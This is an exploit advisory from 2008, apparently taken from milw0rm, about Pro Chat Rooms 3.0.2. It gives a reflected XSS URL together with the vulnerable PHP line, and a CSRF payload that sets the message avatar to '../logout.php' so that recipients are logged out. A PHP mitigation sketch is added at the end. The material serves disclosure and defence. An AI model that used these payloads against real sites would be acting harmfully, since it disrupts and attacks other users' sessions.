#########################################################################
Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilities
#########################################################################
## AUTHOR : ZynbER
## MAiL : ZynbER[at]Gmail[dot]com
## HOME : NoWhere
## Script WebSite : http://www.prochatrooms.com
## Version : Pro Chat Rooms Version 3.0.2
## EXPLOITS :
-==XSS==-
http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED
Vulnerable code in "/profiles/index.php"
<b><?php echo C_PRO2;?>: <?php echo $_GET['gud'];?></b>
-==CSRF==-
When a user sends a message in a public room or in a PM to another user, there is a parameter
to set an avatar (ex: "image.gif"); we will exploit this param to run a CSRF when the user gets our message.
The JS sending function; here you can see all params needed to POST a message to a user/room:
//Add a message to the chat server.
function sendChatText() {
    if(!document.getElementById('txt_message').value) {
        alert("You have not entered a message ");
        return;
    }
    if(document.getElementById('whisper').value.toLowerCase() == document.getElementById('thisuser').value.toLowerCase()) {
        alert("You cannot whisper to yourself! ");
        return;
    }
    if (sendReq.readyState == 4 || sendReq.readyState == 0) {
        sendReq.open("POST", 'sendData.php?chat=1&last=' + lastMessage + '&room=' + room, true);
        sendReq.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
        sendReq.onreadystatechange = handleSendChat;
        var param = 'message=' + document.getElementById('txt_message').value;
        param += '&name=' + chat_user;
        param += '&nid=' + chat_userid;
        param += '&chat=1';
        param += '&room=' + room;
        param += '&whisper=' + document.getElementById('whisper').value;
        param += '&fontface=' + document.getElementById('font_face').value;
        param += '&fontcolor=' + document.getElementById('font_color').value;
        param += '&fontheight=' + document.getElementById('font_height').value;
        param += '&fontstyle=' + document.getElementById('font_style').value;
        param += '&avatar=' + document.getElementById('user_avatar').value;
        sendReq.send(param);
        document.getElementById('txt_message').value = '';
    }
}
Exploit Example:
default ==> http://www.yoursite.com/[path]/Avatars/online.gif
Your malicious CSRF param; avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php
In this example the user will be logged out when he receives your message; in a public room all users will
be logged out from the room ;)
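
Mitigation sketch for both issues above, as an added example that is not part of the original advisory or the vendor's code: the `gud` value is HTML-escaped before it is echoed, and the `avatar` value is accepted only as a bare image file name that exists in the avatar directory. The function names `h` and `safe_avatar`, the allowlist pattern, the "Profile" label standing in for `C_PRO2`, and the demo directory are assumptions.

```php
<?php
// Added example: hardened handling of the two inputs named in the advisory.
// Function names, allowlist pattern and demo paths are assumptions.
declare(strict_types=1);

/** Escape a request value for output in HTML text or attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Accept only a bare image file name that exists in the avatar directory.
 * Anything else (path separators, "..", URLs, other extensions, unknown
 * files) falls back to the default avatar.
 */
function safe_avatar(string $input, string $avatarDir, string $default = 'online.gif'): string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(gif|png|jpe?g)\z/', $input)) {
        return $default;
    }
    $base = realpath($avatarDir);
    $real = realpath($avatarDir . DIRECTORY_SEPARATOR . $input);
    // The resolved file must sit directly inside the avatar directory.
    if ($base === false || $real === false || dirname($real) !== $base) {
        return $default;
    }
    return $input;
}

// Constructed demo: a temporary avatar directory and sample request values.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'avatars_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
touch($dir . DIRECTORY_SEPARATOR . 'online.gif');
touch($dir . DIRECTORY_SEPARATOR . 'smile.gif');

foreach (['smile.gif', '../logout.php', 'missing.gif', 'http://example.test/x.gif'] as $avatar) {
    printf("%-28s => %s\n", $avatar, safe_avatar($avatar, $dir));
}

// profiles/index.php: the echoed value, escaped before output.
$gud = '<b>XSSED</b>'; // constructed stand-in for $_GET['gud']
echo '<b>Profile: ' . h($gud) . "</b>\n";
```

Validating the avatar on the server stops a message from pointing other users' browsers at arbitrary paths; a logout that is only accepted as a POST carrying a per-session token would additionally not fire from an image request.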
## Note:
This info is for educational purposes only;
I'm not responsible for any damage caused...
## GREETZ : Str0ke - 7issa - Zakhm0ki - samIR - Chicha - Sn@k-baraka
-=== Marequin is proud to be one ===-
#########################################################################
# milw0rm.com [2008-12-10]